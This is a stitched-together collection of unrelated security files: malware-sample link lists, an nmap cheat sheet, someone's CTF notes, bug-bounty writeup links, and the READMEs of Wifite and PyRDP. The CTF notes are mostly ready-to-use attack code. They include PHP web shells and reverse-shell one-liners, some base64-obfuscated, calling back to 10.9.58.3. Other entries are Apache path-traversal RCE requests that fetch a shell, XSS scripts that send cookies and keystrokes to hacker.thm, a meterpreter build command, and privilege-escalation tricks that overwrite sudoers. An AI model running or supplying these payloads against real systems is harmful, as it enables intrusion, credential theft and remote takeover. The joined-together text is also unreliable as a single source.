- [Virusign](http://www.virusign.com/)
- [theZoo / Malware DB](http://ytisf.github.io/theZoo/)
- [malc0de](http://malc0de.com/database/)
- [FakeAVs blog](http://www.fakeavs.com/)
- [malware_traffic](http://malware-traffic-analysis.net/)
- [Georgia Tech malrec page](http://panda.gtisc.gatech.edu/malrec/)
- [Kernelmode Forum](http://www.kernelmode.info)
- [Malware Hub Forum](http://malwaretips.com/categories/malware-hub.103/)
- [MalwareBlacklist.com](http://www.malwareblacklist.com)
- [Joxean Koret’s List](http://malwareurls.joxeankoret.com)
- [Sucuri Research Labs](http://labs.sucuri.net/?malware)
- [CLEAN MX realtime database](http://support.clean-mx.de/clean-mx/viruses.php)
- [Contagio Mobile Malware](http://contagiominidump.blogspot.com/)
- [Android Sandbox](http://androidsandbox.net/samples/)
- [maltrieve](http://maltrieve.org/)
- [HoneyDrive](http://bruteforce.gr/honeydrive)
## Miscellaneous
- Git
- [Pro Git Book](http://git-scm.com/book/en/v2)
- [Git for beginners: The definitive practical guide](http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide)
- [Git Tips](https://github.com/git-tips/tips)
- [Learn Git Branching](http://pcottle.github.io/learnGitBranching/)
- [Learn Enough Git to Be Dangerous](http://www.learnenough.com/git-tutorial)
- [Git - The simple guide - No deep shit!](http://rogerdudler.github.io/git-guide/)
- [Como usar o git e o github](http://codexico.com.br/blog/linux/tutorial-simples-como-usar-o-git-e-o-github/)
- [Understanding git for real by exploring the .git directory](https://medium.com/@pierreda/understanding-git-for-real-by-exploring-the-git-directory-1e079c15b807#.9on7nfk8z)
- [Explore GitHub](https://github.com/explore)
- [Github Visualizer](http://veniversum.me/git-visualizer/)
- [Trending in Open Source](https://github.com/trending)
- [WakaTime - Quantify your coding](https://wakatime.com/)
- [Rosetta Code](http://rosettacode.org/wiki/Rosetta_Code)
- [Hidden Features (S.O.)](http://stackoverflow.com/search?q=%5Bhidden-features%5D+is%3Aquestion)
- [SciHub](http://sci-hub.io/)
- [Real-Time Fluid Dynamics for Games](http://www.intpowertechcorp.com/GDC03.pdf)
- [Software Licenses in Plain English](https://tldrlegal.com/)
- [Koding for Teams](http://www.koding.com/)
- [Livecoding.TV](https://www.livecoding.tv/)
- [Simulação Avançada - Vida Artificial](https://student.dei.uc.pt/~guilhoto/downloads/vida_artificial.pdf)
- [Computação Natural](http://www.computacaonatural.com.br/)
- [Torch](http://torch.ch/)
- [ForGe Forensic test image generator](https://github.com/hannuvisti/forge)
- [Volatility memory samples](https://code.google.com/p/volatility/wiki/FAQ)
- [Enron Email Dataset](http://www.cs.cmu.edu/~enron/)
- [The ultimate guide on preventing Website Scraping](https://github.com/JonasCz/How-To-Prevent-Scraping)
- [Type Theory: A Modern Computable Paradigm for Math](http://www.science4all.org/le-nguyen-hoang/type-theory/)
## Todo
- Add repos subsections.
- Remove outdated/not so awesome links.
- Improve titles.
|
## nmap
#### Useful Links
[OSCP Survival Guide - port-scanning](https://github.com/frizb/OSCP-Survival-Guide#port-scanning)
#### NMAP Script details
##### List all available scripts
`locate nse | grep scripts`
##### Enumerate SMB
`nmap -oN nmap_vuln_scan_enum_users_$ip.txt -Pn --script smb-enum-users.nse $ip`
`nmap -oN nmap_vuln_scan_enum_shares_$ip.txt -Pn --script smb-enum-shares.nse $ip`
`nmap -oN nmap_vuln_scan_enum_services_$ip.txt -Pn --script smb-enum-services.nse $ip`
`nmap -oN nmap_vuln_scan_$ip.txt -p445 --script vuln $ip`
##### Subnet Reference Table
/ | Addresses | Hosts | Netmask | Amount of a Class C
--- | --- | --- | --- | ---
/30 | 4 | 2 | 255.255.255.252| 1/64
/29 | 8 | 6 | 255.255.255.248 | 1/32
/28 | 16 | 14 | 255.255.255.240 | 1/16
/27 | 32 | 30 | 255.255.255.224 | 1/8
/26 | 64 | 62 | 255.255.255.192 | 1/4
/25 | 128 | 126 | 255.255.255.128 | 1/2
/24 | 256 | 254 | 255.255.255.0 | 1
/23 | 512 | 510 | 255.255.254.0 | 2
/22 | 1024 | 1022 | 255.255.252.0 | 4
/21 | 2048 | 2046 | 255.255.248.0 | 8
/20 | 4096 | 4094 | 255.255.240.0 | 16
/19 | 8192 | 8190 | 255.255.224.0 | 32
/18 | 16384 | 16382 | 255.255.192.0 | 64
/17 | 32768 | 32766 | 255.255.128.0 | 128
/16 | 65536 | 65534 | 255.255.0.0 | 256
##### Full nmap scan
`nmap -oN nmap_full_$ip -p 1-65535 -T4 -A -v $ip`
##### Intense Scan ALL TCP Ports
`nmap -oN nmap_tcp_$ip.txt -v -p 1-65535 -A -T4 $ip`
##### Enumeration Scan All Ports TCP / UDP and output to file
`nmap -oN nmap_$ip.txt -v -sU -sS -p- -A -T4 $ip`
##### Nmap stealth scan using SYN
`nmap -sS $ip`
##### Nmap stealth scan using FIN
`nmap -sF $ip`
##### Nmap Banner Grabbing
`nmap -sV -sT $ip`
##### Nmap OS Fingerprinting
`nmap -O $ip`
##### Nmap Regular Scan:
`nmap $ip/24`
##### Enumeration Scan
`nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt`
##### Enumeration Scan All Ports TCP / UDP and output to a txt file
`nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip`
##### Nmap output to a file:
`nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24`
##### Quick Scan:
`nmap -T4 -F $ip/24`
##### Quick Scan Plus:
`nmap -sV -T4 -O -F --version-light $ip/24`
##### Quick traceroute
`nmap -sn --traceroute $ip`
##### All TCP and UDP Ports
`nmap -v -sU -sS -p- -A -T4 $ip`
##### Intense Scan:
`nmap -T4 -A -v $ip`
##### Intense Scan Plus UDP
`nmap -sS -sU -T4 -A -v $ip/24`
##### Intense Scan ALL TCP Ports
`nmap -p 1-65535 -T4 -A -v $ip/24`
##### Intense Scan - No Ping
`nmap -T4 -A -v -Pn $ip/24`
##### Ping scan
`nmap -sn $ip/24`
##### Slow Comprehensive Scan
`nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24`
##### Scan with Active connect in order to weed out any spoofed ports
`nmap -p1-65535 -A -T5 -sT $ip`
|
# My Notes for CTF's
# monitoring
### CMD
```
curl "https://185.199.111.153/" -H "host: sa1.lt" --insecure -w "HTTP %{http_code}, TCP Connect: %{time_connect} s, SSL connect: %{time_appconnect} s, First byte: %{time_starttransfer} s, Down speed: %{speed_download} B/s, Total time: %{time_total}\n" -so NUL
```
# Reconnaissance / Info Gathering Stage
## nmap
```
ip=10.10.10.10
nmap -sC -sV $ip
```
## IF Web Server
### JavaScript
```
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e
```
```
gobuster dir -t 20 -x php,txt,html -w /usr/share/wordlists/dirb/common.txt -u http://$ip/
```
## DNS sub domains
```
wfuzz -c -f subdomains.txt -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://domain.ltd/" -H "Host: FUZZ.domain.ltd" --hl 1
```
with gobuster
```
gobuster vhost -u example.com -w /usr/share/amass/wordlists/subdomains.lst | grep "Status: 200" | cut -d " " -f 2
```
# Password Solver:
```
https://dehash.lt
```
## Hydra
```
hydra -I -l username -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/:username=^USER^&password=^PASS^:F=bad username"
```
# Wordpress BruteForce
Prepare wordlist for 8 symbols
```
egrep '^.{8}$' /usr/share/wordlists/rockyou.txt > small.txt
```
```
hydra -l admin -P small.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
```
## wpscan
```
wpscan --url http://example.com -P /usr/share/wordlists/rockyou.txt -U username.txt -t 75
```
## PHP escape
```
php://filter/convert.base64-encode/resource=index.php
```
backdoor shell.php
```
<?php
if (isset($_REQUEST['cmd'])) {
echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
}
?>
```
php serialisation problem if we have _destruct() and unserialize() funciotions
```
<?php
class FormSubmit
{
public $form_file = 'shell.php';
public $message = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/10.9.58.3/1234 0>&1\'");';
}
print urlencode(serialize(new FormSubmit));
?>
```
```
Apache 2.4.49 without CGI:
curl "http://10.10.138.215:8080//cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/flag.txt"
Apache 2.4.49 with CGI
curl "http://10.10.138.215:8081/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash" -d 'echo Content-Type: text/plain; echo; cat /flag.txt' -H "Content-Type: text/plain"
Apache 2.4.50 without CGI:
curl 'http://10.10.138.215:8082/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/flag.txt'
Apache 2.4.50 with CGI:
curl "http://10.10.138.215:8083/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash" -d 'echo Content-Type: text/plain; echo; wget http://10.9.58.3:8000/shell.sh' -H "Content-Type: text/plain"
```
#injection
```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ELEMENT search ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<name>
hello &xxe;
</name><search>
&xxe;</search></root>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ELEMENT search ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">
]>
<root>
<name>
hello &xxe;
</name><search>
&xxe;</search></root>
```
## Windows
```
wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/winPEAS/winPEASbat/winPEAS.bat
python3 -m http.server
```
```
powershell -c "Invoke-WebRequest -Uri 'http://10.9.58.3:8000/winPEAS.bat' -OutFile 'C:\Windows\Temp\winPEAS.bat'"
cd C:\Windows\Temp\
winPEAS.bat
```
## HTTP request from powershell
```
powershell -c "Invoke-WebRequest -Uri 'http://10.9.58.3:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"
```
## SSH Tunnel
```
ssh -L 6969:localhost:8080 [email protected]
socat tcp-listen:8888,reuseaddr,fork tcp:localhost:22
```
Download socat
```
wget -q http://10.9.58.3:8000/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.9.58.3:4444
```
Proxy chain
```
ssh -D 9050 -q -C -N -f user@host
proxychains4 nmap -Pn localhost
```
## SMB
List shares
```
smbclient -L \\\\$ip\\
```
Connect to share
```
smbclient \\\\addres\\share -U username
```
# FTP
```
ftp -i $ip
anonymous
binary
passive off
```
### Steal Cookies
```
# Start Web Server
python3 -m http.server
## Inject XSS On vuln Web App
<script>window.location = 'http://10.9.58.3:8000/?param=' + document.cookie </script>
OR
PoC
<script>alert('XSS');</script>
Session Stealing:
<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>
Key Logger:
<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>
```
Usually there is web and ssh ports openned. Let's scan web directories with gobuster.
# Reverse Shell
```
bash -i >& /dev/tcp/10.9.58.3/12345 0>&1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.58.3 1234 >/tmp/f
mkfifo /tmp/qvfuzlx; nc 10.9.58.3 4444 0</tmp/qvfuzlx | /bin/sh >/tmp/qvfuzlx 2>&1; rm /tmp/qvfuzlx
# 12345
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45LjU4LjMvMTIzNDUgMD4mMQo= | base64 -d | bash
bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.9.58.3%2F12345%200%3E%261
nc${IFS}10.9.58.3${IFS}12345${IFS}-e${IFS}/bin/sh
awk 'BEGIN {s = "/inet/tcp/0/10.9.58.3/1234"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('/bin/bash')
exiftool -Comment="<?php \$p0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$p0)){echo base64_decode('PHByZT4=').shell_exec(\$p0).base64_decode('PC9wcmU+');}die();?>"
python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCAgICAgICAsc3VicHJvY2VzcyAgICAgICAsb3MgICAgICA7aG9zdD0iMTAuOS41OC4zIiAgICAgIDtwb3J0PTEyMzQ1ICAgICAgO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgICAgICAsc29ja2V0LlNPQ0tfU1RSRUFNKSAgICAgIDtzLmNvbm5lY3QoKGhvc3QgICAgICAgLHBvcnQpKSAgICAgIDtvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgLDApICAgICAgO29zLmR1cDIocy5maWxlbm8oKSAgICAgICAsMSkgICAgICA7b3MuZHVwMihzLmZpbGVubygpICAgICAgICwyKSAgICAgIDtwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik=')[0]))"
__import__('os').system('/bin/bash')
echo "import os" > /tmp/module.py
echo "os.system('/bin/bash')" >> /tmp/module.py
sudo PYTHONPATH=/tmp /usr/bin/python /scripts/Script.py
shell.php
<?php echo system($_GET['qq']); ?>
GET /example/shell.php?qq=id HTTP/1.1
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.58.3 LPORT=9001 -f exe -o shell.exe
while true; do sleep 5 && mknod /dev/shm/p p; cat /dev/shm/p | /bin/bash -i | nc 127.0.0.1 9001 >/dev/shm/p; done
```
## If less
```
(ALL) /usr/local/bin/less
echo 'bash -i >& /dev/tcp/10.9.58.3/12345 0>&1' >> /usr/local/bin/less
sudo /usr/local/bin/less
```
PHP
```
"<?php system($_GET['cmd']);?>"
"<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/10.9.58.3/12345 0>&1'\"); ?>"
<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.58.3 1234 >/tmp/f') ?>
```
### Upgrade the shell # on macOS works with BASH only
```
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/sh")'
```
### CTRL + Z
```
stty raw -echo
fg
```
### Back to Reverse Shell
```
export TERM=xterm
```
## Reverse shell with MSF
```
use exploit/unix/webapp/wp_admin_shell_upload
```
(More Reverse Shells)
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#bash-tcp]
# John
```
ssh2john.py id_rsa > ssh.key
john ssh.key # or
john ssh.key -w=/usr/share/wordlists/rockyou.txt
```
# Hashcat
Linux shadow file
```
hashcat -m 1800 -a0 hash.txt /usr/share/wordlists/rockyou.txt -O
```
zip file
```
fcrackzip backup.zip -v -u -D -p /usr/share/wordlists/rockyou.txt
```
# Linux PrivEsc In the machine
```
curl linuxenum.savenas.lt -sL | bash
find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -name user.txt 2>/dev/null
find / -regextype posix-extended -regex './(flag*|root|user)\.txt$' -exec cat {} \; 2> /dev/null
find / -name id_rsa 2> /dev/null
getcap -r / 2> /dev/null
cat /etc/crontab
sudo -l
sudo -u#-1 /bin/bash #if (ALL, !root) NOPASSWD: /bin/bash
#NFS
ssh -fNv -L 2049:localhost:2049 [email protected]
sudo mount -t nfs localhost:/var/nfs nfs/
mkdir nfs && cd nfs
sudo cp /bin/sh .
chmod +s sh
```
if getcaps are:
### python
```
python: exit_code = os.system(‘/bin/sh’) output = os.popen(‘/bin/sh’).read()
```
### perl
```
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
```
### tar
```
/bin/tar = cap_dac_read_search+ep
tar -cvf root.tar /root/root.txt
tar -xvf root.tar
```
## If there is a command with relative path, let's clean global variables and use own
```
echo /bin/bash > /tmp/date && chmod +x /tmp/date
export PATH=/tmp:$PATH
/tmp/bash -p
```
### Priv Escalation Using Tar in crontab set
```
echo 'echo "user ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh
echo "" > "--checkpoint-action=exec=sh privesc.sh"
echo "" > --checkpoint=1
```
Wait 1 minute for the Bash script to execute.
Docker
```
docker run --privileged -v /root/.ssh/:/root -ti image /bin/bash
or
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
```
LXC
Download an image:
```
lxc image import ./alpine-v3.12-i686-20200831_2036.tar.gz --alias alpine
lxc init alpine ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
cd /mnt/root/root/
```
if you're getting message
```
Failed container creation: No storage pool found. Please create a new storage pool.
```
need to initialise storage with
```
lxd init
```
### Post Explotation: sometimes works suggetor
```
curl https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -s | bash
```
# Dirty Cow
```
gcc -pthread dirtycow/c0w.c -o c0w
```
# SETUID
```
mkdir /tmp/1
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c
gcc /tmp/1/x.c -o /tmp/1/x
chmod +s /tmp/1/x
```
# SQLi
MySQL
```
Boolen blind
1' OR 3*2*1=6 AND 000365=000365 --
Time-Based blind
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z
0 UNION ALL SELECT group_concat(column_name),null,null,null,null FROM information_schema.columns WHERE table_name="users"
```
## SQLite
Demon on https://sqliteonline.com
Check the tables
```
SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
```
# Windows Priv
```
Start-Process powershell 'Start-Process cmd -Verb RunAs' -Credential administrator
```
result is demo
List columns
```
SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='demo'
') UNION SELECT NULL, NULL, NULL,NULL -- -
or
') union select 1,2,3,4 --
then
') union select 1,2,3,group_concat(tbl_name) from sqlite_master where type='table' and tbl_name not like 'sqlite_%' --
and then
') union select 1,2,3,group_concat(password) from users --
```
|
# Video tutorial series to go with the HTB challenges
[![HackTheBox Challenges](https://img.youtube.com/vi/0jCGyf32rHs/0.jpg)](https://www.youtube.com/watch?v=0jCGyf32rHs&list=PLHUKi1UlEgOIn12nvhwwq2aTU8bG-FE0I "HackTheBox Challenges")
[Sign up for HackTheBox!](https://affiliate.hackthebox.com/cryptocat-htb) |
# 👨🏻💻 Bug Bounty Blogs and Writeups of different vulnerablities
## This is how they hacked Apple
***Some of the vulnerailities are explained here, take a look down here***
> ***https://samcurry.net/hacking-apple/***
## HTTP Request Smuggling Tips from honoki
> ***https://honoki.net/2020/02/18/http-request-smuggling-5-practical-tips/***
## XSS in PhantomJS
> ***https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/***
## Exploiting Open Redirect Vulnerabilities
> ***https://www.hahwul.com/phoenix/ssrf-open-redirect***
> ***https://hackerone.com/reports/978680***
## HTML Injection
> ***https://medium.com/@pratiky054/html-injection-unique-exploitation-a5c3d4e6fed8***
> ***https://footstep.ninja/posts/html-injection-in-email/***
## Leveraging XSS to Read Internal Files
> ***https://blog.dixitaditya.com/leveraging-xss-to-read-internal-files/amp/?__twitter_impression=true***
## Unauthenticated Account Takeover through HTTP Leak
> ***https://medium.com/@mrnikhilsri/unauthenticated-account-takeover-through-http-leak-33386bb0ba0b***
## Account Takeover via IDOR in Starbucks Singapore
> ***http://www.kamilonurozkaleli.com/posts/starbucks-singapore-account-takeover/***
## CSRF Exploiting in JSON Endpoint
> ***https://rootsploit.com/exploiting-csrf-on-json-endpoint-w-o-flash/#comment-5***
(***Note: Rootsploit has plenty of posts for Bug Bounty Writeups)***
> ***https://rootsploit.com/***
## Find Sensitive Information via Source Code
> ***https://medium.com/@sechunter/js-is-love-%EF%B8%8F-ca393a4849e9***
## Exploiting Admin Panel Like a Boss
> ***https://medium.com/@sechunter/exploiting-admin-panel-like-a-boss-fc2dd2499d31***
## 🐞 BugPoC LFI Challenge
> ***https://hipotermia.pw/bb/bugpoc-lfi-challenge***
## Powerfull HTTP Request Smugling
> ***https://medium.com/@ricardoiramar/the-powerful-http-request-smuggling-af208fafa142***
## How I hacked hundreds of companies through their helpdesk
> ***https://medium.com/intigriti/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c***
## Weaponizing XSS For Fun & Profit😆😂🤣
> ***https://saadahmedx.medium.com/weaponizing-xss-for-fun-profit-a1414f3fcee9***
## Shodan Pentesting Guide
> ***https://community.turgensec.com/shodan-pentesting-guide/***
## Hacking HTTP CORS from inside out: a theory to practice approach
> ***https://medium.com/bugbountywriteup/hacking-http-cors-from-inside-out-512cb125c528***
HTTP Request Smuggling
> ***https://blog.cobalt.io/a-pentesters-guide-to-http-request-smuggling-8b7bf0db1f0***
## Bad Neighbour Vulnerability
> ***http://blog.pi3.com.pl/?p=780***
## RCE via git option injection (almost) - $20,000 Bounty
> ***https://devcraft.io/2020/10/18/github-rce-git-inject.html***
## How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM
> ***https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html?m=1***
## Compromising S3 Buckets through Misconfigured AWS Cognito
> ***https://medium.com/@curlsandbun/compromising-s3-buckets-through-misconfigured-aws-cognito-e23f08b2f475***
## Gateway2Hell – Multiple Privilege Escalation Vulnerabilities in Citrix Gateway Plug-In - Cymptom
> ***https://cymptom.com/gateway2hell-multiple-privilege-escalation-vulnerabilities-in-citrix-gateway-plug-in/2020/10/****
## Multiple Address Bar Spoofing Vulnerabilities In Mobile Browsers
> ***https://www.rafaybaloch.com/2020/10/multiple-address-bar-spoofing-vulnerabilities.html***
## IDOR and SQL Injection
> ***https://bugreader.com/ahmad_halabi@idor-sql-query-manipulation-to-fetch-user-details-228***
---------------------------------------------------------- 👉 **[Back to Main Page](https://github.com/thevillagehacker/Bug-Hunting)** 👈 ----------------------------------------------------------
|
THIS PROJECT IS IN LIFE-SUPPORT MODE
------------------------------------
This repo tracks the old version of Wifite (*v1*) which does not receive frequent updates and has many bugs (check out the *Isuses* tab!).
There's a new version of Wifite (*Wifite2*) available at [https://github.com/derv82/wifite2](https://github.com/derv82/wifite2). *Wifite2* has more features, bug fixes, and reliability.
*Try the new Wifite2, especially if you're having problems with Wifite v1*
About
-----
_Wifite is for Linux only._
Wifite is an automated wireless attack tool.
Wifite was designed for use with pentesting distributions of Linux, such as [Kali Linux](http://www.kali.org/), [Pentoo](http://www.pentoo.ch/), [BackBox](http://www.backbox.org); any Linux distributions with wireless drivers patched for injection. The script appears to also operate with Ubuntu 11/10, Debian 6, and Fedora 16.
Wifite must be run as __root__. This is required by the suite of programs it uses. Running downloaded scripts as root is a bad idea. I recommend using the Kali Linux bootable Live CD, a bootable USB stick (for persistent), or a virtual machine. Note that Virtual Machines cannot directly access hardware so a wireless USB dongle would be required.
Wifite assumes that you have a wireless card and the appropriate drivers that are patched for injection and promiscuous/monitor mode.
Execution
---------
To download and execute wifite, run the commands below:
`wget https://raw.github.com/derv82/wifite/master/wifite.py`
`chmod +x wifite.py`
`./wifite.py`
Required Programs
-----------------
Please see [the installation guide](https://github.com/derv82/wifite/wiki/Installation) on the wiki for help installing any of the tools below.
* [__Python 2.7.x__](http://python.org/getit/). Wifite is a Python script and requires Python to run.
* [__aircrack-ng suite__](http://aircrack-ng.org/).
This is absolutely required. The specific programs used in the suite are:
* airmon-ng,
* airodump-ng,
* aireplay-ng,
* packetforge-ng, and
* aircrack-ng.
* Standard linux programs.
* iwconfig, ifconfig, which, iw
Suggested Programs
------------------
_`*` indicates program is not included in [Backtrack 5 R1](http://www.backtrack-linux.org/)_
* `*`[__reaver__](https://github.com/t6x/reaver-wps-fork-t6x), a Wifi-Protected Setup (WPS) attack tool. Reaver includes a scanner "walsh" (or "wash") for detecting WPS-enabled access points. Wifite uses Reaver to scan for and attack WPS-enabled routers.
* `*`[__pyrit__](https://github.com/JPaulMora/Pyrit), a GPU cracker for WPA PSK keys. Wifite uses pyrit (if found) to detect handshakes. In the future, Wifite may include an option to crack WPA handshakes via pyrit.
* __tshark__. Comes bundled with [Wireshark](http://www.wireshark.org/), packet sniffing software.
* [__cowpatty__](http://www.willhackforsushi.com/Cowpatty.html), a WPA PSK key cracker. Wifite uses cowpatty (if found) to detect handshakes.
Licensing
---------
Wifite is licensed under the GNU General Public License version 2 (GNU GPL v2).
(C) 2010-2012 Derv Merkler
|
# PyRDP
![pipeline status](https://github.com/GoSecure/pyrdp/workflows/Build/badge.svg?branch=master)
[![Black Hat Arsenal 2019](https://raw.githubusercontent.com/toolswatch/badges/master/arsenal/usa/2019.svg?sanitize=true)](https://www.blackhat.com/us-19/arsenal/schedule/index.html)
[![Black Hat Arsenal 2021](https://raw.githubusercontent.com/toolswatch/badges/master/arsenal/usa/2021.svg?sanitize=true)](https://www.blackhat.com/us-21/arsenal/schedule/index.html)
PyRDP is a Python Remote Desktop Protocol (RDP) Monster-in-the-Middle (MITM) tool and library.
![PyRDP Logo](https://raw.githubusercontent.com/GoSecure/pyrdp/master/docs/pyrdp-logo.svg?sanitize=true)
It features a few tools:
- RDP Monster-in-the-Middle
- Logs plaintext credentials or NetNTLM hashes used when connecting
- Steals data copied to the clipboard
- Saves a copy of the files transferred over the network
- Crawls shared drives in the background and saves them locally
- Saves replays of connections so you can look at them later
- Runs console commands or PowerShell payloads automatically on new connections
- RDP Player:
- See live RDP connections coming from the MITM
- View replays of RDP connections
- Take control of active RDP sessions while hiding your actions
- List the client's mapped drives and download files from them during active sessions
- Converter tool:
- Convert RDP replays to videos for easier sharing
- Convert RDP replays to a sequence of low-level events serialized in JSON format
- Convert PCAPs to replays, videos or JSON events
- Convert decrypted PCAPs (L7 PDUs) to replays, videos or JSON events
- RDP Certificate Cloner:
- Create a self-signed X509 certificate with the same fields as an RDP server's certificate
PyRDP was [introduced in 2018](https://www.gosecure.net/blog/2018/12/19/rdp-man-in-the-middle-smile-youre-on-camera) in
which we [demonstrated that we can catch a real threat actor in
action](https://www.youtube.com/watch?v=eB7RC9FmL6Q). This tool is being developed with both pentest and malware
research use cases in mind.
![PyRDP Player Replaying an RDP session](docs/screens/replay.png)
## Table of Contents
- [Supported Systems](#supported-systems)
- [Installing](#installing)
* [Using the Docker Image](#using-the-docker-image)
* [From Git Source](#from-git-source)
* [Installing on Windows](#installing-on-windows)
* [Building the Docker Image](#building-the-docker-image)
- [Using PyRDP](#using-pyrdp)
* [Using the PyRDP Monster-in-the-Middle](#using-the-pyrdp-monster-in-the-middle)
* [Using the PyRDP Player](#using-the-pyrdp-player)
* [Using the PyRDP Certificate Cloner](#using-the-pyrdp-certificate-cloner)
* [Using PyRDP Convert](#using-pyrdp-convert)
* [Configuring PyRDP](#configuring-pyrdp)
* [Advanced Usage](#advanced-usage)
* [Docker Specific Usage Instructions](#docker-specific-usage-instructions)
- [PyRDP Lore](#pyrdp-lore)
- [Contributing to PyRDP](#contributing-to-pyrdp)
- [Acknowledgements](#acknowledgements)
## Supported Systems
PyRDP should work on Python 3.6 and up on the x86-64, ARM and ARM64 platforms.
This tool has been tested to work on Python 3.6 on Linux (Ubuntu 18.04, 20.04), Raspberry Pi and Windows
(see section [Installing on Windows](#installing-on-windows)). It has not been tested on macOS.
## Installing
### Using the Docker Image
This is the easiest installation method if you have docker installed and working.
```
docker pull gosecure/pyrdp:latest
```
As an alternative we have a slimmer image without the GUI and ffmpeg dependencies.
This is the only provided image on ARM platforms.
```
docker pull gosecure/pyrdp:latest-slim
```
You can find the list of all our Docker images [on the gosecure/pyrdp DockerHub page](https://hub.docker.com/r/gosecure/pyrdp/tags).
The `latest` tag refers to the latest released version while the `master` tag is the docker image built out of our `master` branch.
### From Git Source
We recommend installing PyRDP in a
[virtualenv environment](https://packaging.python.org/guides/installing-using-pip-and-virtual-environments/)
to avoid dependency issues.
First, make sure to install the prerequisite packages (on Ubuntu). We provide two types of installs a full one and a
slim one. Install the dependencies according to your use case.
```
# Full install (GUI, transcoding to MP4)
sudo apt install python3 python3-pip python3-dev python3-setuptools python3-venv \
build-essential python3-dev git openssl \
libgl1-mesa-glx \
libnotify-bin \
libxkbcommon-x11-0 libxcb-xinerama0 \
libavformat-dev libavcodec-dev libavdevice-dev \
libavutil-dev libswscale-dev libswresample-dev libavfilter-dev
# Slim install (no GUI, no transcoding)
sudo apt install python3 python3-pip python3-setuptools python3-venv \
build-essential python3-dev git openssl
```
Grab PyRDP's source code:
```
git clone https://github.com/gosecure/pyrdp.git
```
Then, create your virtual environment in the `venv` directory inside PyRDP's directory:
```
cd pyrdp
python3 -m venv venv
```
*DO NOT* use the root PyRDP directory for the virtual environment folder (`python3 -m venv .`). You will make a mess,
and using a directory name like `venv` is more standard anyway.
Before installing the dependencies, you need to activate your virtual environment:
```
source venv/bin/activate
```
Finally, you can install the project with Pip:
```
pip3 install -U pip setuptools wheel
# Without GUI and ffmpeg dependencies
pip3 install -U -e .
# With GUI and ffmpeg dependencies
pip3 install -U -e '.[full]'
```
